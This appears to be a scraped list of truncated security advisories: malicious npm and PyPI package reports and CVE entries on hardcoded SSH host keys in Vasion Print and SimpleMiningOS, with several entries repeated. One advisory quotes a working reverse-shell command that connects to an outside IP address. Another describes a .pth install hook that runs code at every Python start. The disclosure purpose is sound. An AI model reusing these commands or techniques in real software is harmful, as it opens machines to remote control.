MAL-2026-4679 Malicious code in system-user-identifier-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8 index.js line 13 executes bash -c "bash -i & /dev/tcp/101.43.232.7/7777 0&1" via childprocess.exec, opening an interactive reverse shell to the...

Malicious code in system-user-identifier-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8 index.js line 13 executes bash -c "bash -i & /dev/tcp/101.43.232.7/7777 0&1" via childprocess.exec, opening an interactive reverse shell to the...

Malicious code in gt-tester-exp-profiler-exp-00000015 (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 55fc219f03cbaeeedb660ad423cc7af08ff1d29154c8b8989b7b0c5d7d5c3d75 setup.py installs a.pth file containing import gttesterexpprofilerexp00000015.probe; probe.runprobe, causing every Python interpreter start on the...

MAL-2026-4399 Malicious code in @kedem/okdb (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cfce9a94c70e54caff77645f380418abda1bb1a38ad9cda61f6fbeaa482e2fed The package's CLI entry point at bin/okdb.js is a heavily obfuscated single-line bundle hex-mangled symbols like 0x2a69e2/0x5d02f6 that constructs HT...

CVE-2025-34198

Vasion Print formerly PrinterLogic Virtual Appliance Host versions prior to 22.0.951 and Application prior to 20.0.2368 VA and SaaS deployments contain shared, hardcoded SSH host private keys in the appliance image. The same private host keys RSA, ECDSA, and ED25519 are present across...

CVE-2025-34198 Vasion Print (formerly PrinterLogic) Shared / Hardcoded SSH Host Private Keys in Appliance Image

Vasion Print formerly PrinterLogic Virtual Appliance Host versions prior to 22.0.951 and Application prior to 20.0.2368 VA and SaaS deployments contain shared, hardcoded SSH host private keys in the appliance image. The same private host keys RSA, ECDSA, and ED25519 are present across...

CVE-2025-34198 Vasion Print (formerly PrinterLogic) Shared / Hardcoded SSH Host Private Keys in Appliance Image

Vasion Print formerly PrinterLogic Virtual Appliance Host versions prior to 22.0.951 and Application prior to 20.0.2368 VA and SaaS deployments contain shared, hardcoded SSH host private keys in the appliance image. The same private host keys RSA, ECDSA, and ED25519 are present across...

CVE-2019-19753

SimpleMiningOS through v1259 ships with SSH host keys baked into the installation image, which allows man-in-the-middle attacks and makes identification of all public IPv4 nodes trivial with Shodan.io. NOTE: the vendor indicated that they have no plans to fix this, and discourage deployment using...